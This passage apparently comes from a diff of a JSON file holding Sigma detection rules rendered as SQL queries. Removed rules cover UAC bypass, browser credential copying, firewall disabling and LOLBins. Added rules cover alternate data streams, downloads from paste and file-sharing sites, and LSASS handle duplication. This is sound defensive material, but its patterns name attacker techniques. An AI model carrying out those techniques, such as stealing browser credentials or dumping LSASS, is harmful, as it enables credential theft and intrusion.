'%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Creation Of a Suspicious ADS File Outside a Browser Download", + "id": "573df571-a223-43bc-846e-3f98da481eca", + "status": "experimental", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Other legitimate browsers not currently included in the filter 
(please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR 
TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_sc_service_path_modification.yml" + "filename": "create_stream_hash_creation_internet_file.yml" }, { - "title": "Potential Browser Data Stealing", - "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "status": "experimental", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "description": "Detects potential suspicious winget package installation from a suspicious source.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Contents LIKE 
'[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_copy_browser_data.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "Windows Firewall Disabled via PowerShell", - "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "author": "Tim Rauch", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_firewall.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Code Execution via Pcwutl.dll", - "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "author": "Julia 
Fomina, oscd.community", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1564.004" ], "falsepositives": [ - "Use of Program Compatibility Troubleshooter Helper" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_pcwutl.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "title": "Unusual File Download From File Sharing Websites", + "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "status": "experimental", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE 
'%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE 
'\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "title": "Hidden Executable In NTFS Alternate Data Stream", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian 
Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", + "author": "Florian Roth (Nextron Systems), @0xrawsec", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "create_stream_hash_ads_executable.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", 
"tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1218.009" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is 
normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE 
'%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage 